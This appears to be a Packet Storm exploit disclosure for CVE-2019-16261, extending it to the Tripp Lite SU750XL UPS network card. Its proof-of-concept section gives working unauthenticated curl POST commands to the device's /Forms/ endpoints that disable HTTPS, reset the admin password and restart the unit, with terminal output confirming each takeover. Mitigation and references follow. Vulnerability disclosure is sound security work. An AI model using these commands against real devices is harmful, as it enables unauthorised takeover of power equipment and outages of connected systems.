Tripp Lite SU750XL UPS Privilege Escalation / Missing Authentication exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:189949 [Author]: Lucas Lalumiere [Contact]: lucas.lalum@gmail.com [Date]: 2025-3-17 [Vendor]: Tripp Lite [Product]: SU750XL UPS [Firmware]: 12.04.0052 [CVE Reference]: CVE-2019-16261 ============================ Affected Products (Tested): ============================ - Tripp Lite PDU's (e.g., PDUMH15AT) - Tripp Lite UPS's (e.g., SU750XL) *NEW* ====================== Vulnerability Summary: ====================== CVE-2019-16261 describes a critical vulnerability in the Tripp Lite PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send POST requests to the `/Forms/` directory to: - Change admin or manager passwords - Shut off power to an outlet - Disable/enable services Through my own experimentation, I have discovered that this vulnerability is also effective on Tripp Lite UPS systems, including my Tripp Lite SU750XL, and applies to firmware 12.04.0052. This suggests the issue extends beyond just PDUs, as mentionned in the CVE, to the network cards equipped in Tripp Lite PDU's and UPS's (like my SNMPWEBCARD55) with vulnerable firmware versions 12.04.0053 and below. ========================= Proof of Concept (PoC): ========================= These curl commands, similar to those provided originally by Jim Becher's blog, are among those I've tested on the SU750XL. 1. Turning off Services (like HTTPS): ``` curl -X POST -d "netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes" http://[DEVICE_IP]/Forms/network_web_1 curl -X POST -d "startreset=Restart+PowerAlert" http:// [DEVICE_IP]/Forms/requestreset_1 ``` Result (PowerAlert terminal): ``` System settings were changed. Initiating system shutdown procedure ... complete. The system is restarting now. ... SERVICES: HTTP is enabled on port 80 HTTPS is disabled on port 443 SSH is enabled on port 22 TELNET is enabled on port 23 FTP is enabled on port 21 SYSLOG is enabled ``` 2. Change Admin Password ``` curl -X POST -d "securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes" http://[DEVICE_IP]/Forms/system_security_1 curl -X POST -d "startreset=Restart+PowerAlert" http:// [DEVICE_IP]/Forms/requestreset_1 ``` Result (PowerAlert terminal): ``` System settings were changed. Initiating system shutdown procedure ... complete. The system is restarting now. ... Login: newadmin Password: ***** Logged in as user newadmin $ _ ``` ======= Impact: ======= - High Availability Impact: Attackers can remotely control power functions, affecting critical systems connected to PDU/UPS'. - High Confidentiality Impact: Attackers can obtain admin access to any of the device's information via changing credentials. - High Integrity Impact: Attackers, if not through the POST requests, can modify any configuration by using modified admin credentials. =============== Exploit Status: =============== This vulnerability has already been patched in newer network card firmware versions and acknowledged by Eaton. It was previously reported in CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDU's. ======================= Recommended Mitigation: ======================= Upgrade webcard firmware to the newest version. You can find the download here: - https://tripplite.eaton.com/support/downloads?type=software&subtype=32 =========== References: =========== - Original discovery: https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits - CVE-2019-16261: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261 ==================== Discoverer/Credits: ==================== - Jim Becher, 2019-08-19 This disclosure is being submitted to expand upon the original CVE report, adding additional affected products and detail. My find confirms that both Tripp Lite UPS and PDU devices equipped with optional network cards (e,g. SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.